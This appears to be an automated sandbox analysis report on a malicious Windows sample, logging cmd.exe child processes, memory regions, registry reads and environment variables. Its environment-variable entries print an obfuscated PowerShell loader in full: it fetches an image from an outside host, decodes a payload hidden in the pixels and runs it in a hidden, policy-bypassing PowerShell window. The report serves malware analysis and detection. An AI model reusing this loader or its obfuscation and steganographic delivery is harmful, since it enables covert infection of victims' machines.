Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = *[-,, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'ype -As'+'sembly'+'Name 9axSystem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr Syste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr By'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[Syst'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))^&^& seT aDIzy=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Process #12: cmd.exe
625 0
»
Information Value
ID #12
File Name c:\windows\system32\cmd.exe
Command Line cmd ;
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:43, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:23
OS Process Information
»
Information Value
PID 0xb44
Parent PID 0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B48
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File r False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory rw True False False -
private_0x0000000000230000 0x00230000 0x0032ffff Private Memory rw True False False -
private_0x0000000000330000 0x00330000 0x0042ffff Private Memory rw True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory rw True False False -
pagefile_0x0000000000560000 0x00560000 0x006e7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000006f0000 0x006f0000 0x00870fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000880000 0x00880000 0x01c7ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001c80000 0x01c80000 0x01fc2fff Pagefile Backed Memory r True False False -
private_0x0000000001fd0000 0x01fd0000 0x020cffff Private Memory rw True False False -
basebrd.dll 0x020d0000 0x02197fff Memory Mapped File r False False False -
pagefile_0x00000000021a0000 0x021a0000 0x02592fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x025a0000 0x0286efff Memory Mapped File r False False False -
private_0x0000000002870000 0x02870000 0x02a6ffff Private Memory rw True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd6fff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (569)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 9
Fn
Get Info STD_INPUT_HANDLE type = file_type True 4
Fn
Get Info cmd.exE type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 37
Fn
Open STD_INPUT_HANDLE - True 257
Fn
Read STD_INPUT_HANDLE size = 1, size_out = 1 True 249
Fn
Data
Read STD_INPUT_HANDLE size = 1, size_out = 0 False 1
Fn
Write STD_OUTPUT_HANDLE size = 36 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 2 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 63 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 26 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 1095 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xb4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Get Info C:\Windows\system32\cmd.exe type = PROCESS_BASIC_INFORMATION True 1
Fn
Memory (1)
»
Operation Process Additional Information Success Count Logfile
Read C:\Windows\system32\cmd.exe address = 0x7fffffdf000, size = 896 True 1
Fn
Data
Module (10)
»
Operation Module Additional Information Success Count Logfile
Load NTDLL.DLL base_address = 0x77c40000 True 1
Fn
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = NtQueryInformationProcess, address_out = 0x77c914a0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 141352 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (21)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 3
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = {foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math] False 1
Fn
Get Environment String name = adizY False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #13: cmd.exe
62 0
»
Information Value
ID #13
File Name c:\windows\system32\cmd.exe
Command Line cmd.exE /c %adizY%
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:44, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
»
Information Value
PID 0xb4c
Parent PID 0xb44 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B50
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File r False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x001effff Private Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory rw True False False -
private_0x0000000000260000 0x00260000 0x0035ffff Private Memory rw True False False -
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory rw True False False -
private_0x0000000000400000 0x00400000 0x004fffff Private Memory rw True False False -
pagefile_0x0000000000500000 0x00500000 0x00687fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000690000 0x00690000 0x00810fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000820000 0x00820000 0x01c1ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001c20000 0x01c20000 0x01f62fff Pagefile Backed Memory r True False False -
private_0x0000000001f70000 0x01f70000 0x0206ffff Private Memory rw True False False -
sortdefault.nls 0x02070000 0x0233efff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open - - True 1
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xb54, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xb5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 141633 True 1
Fn
Environment (20)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = adizY, result_out = EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) |POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd ^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
Process #14: cmd.exe
50 0
»
Information Value
ID #14
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /S /D /c" EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) "
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:44, Reason: Child Process
Unmonitor End Time: 00:01:45, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xb54
Parent PID 0xb4c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B58
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00045fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory rw True False False -
pagefile_0x0000000000150000 0x00150000 0x00153fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
locale.nls 0x00170000 0x001d6fff Memory Mapped File r False False False -
private_0x00000000001e0000 0x001e0000 0x002dffff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x002e0fff Private Memory rw True False False -
private_0x00000000002f0000 0x002f0000 0x002f0fff Private Memory rw True False False -
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory rw True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory rw True False False -
private_0x00000000005e0000 0x005e0000 0x005effff Private Memory rw True False False -
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001d10000 0x01d10000 0x02052fff Pagefile Backed Memory r True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 6
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Write STD_OUTPUT_HANDLE size = 79 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 141758 True 1
Fn
Environment (9)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
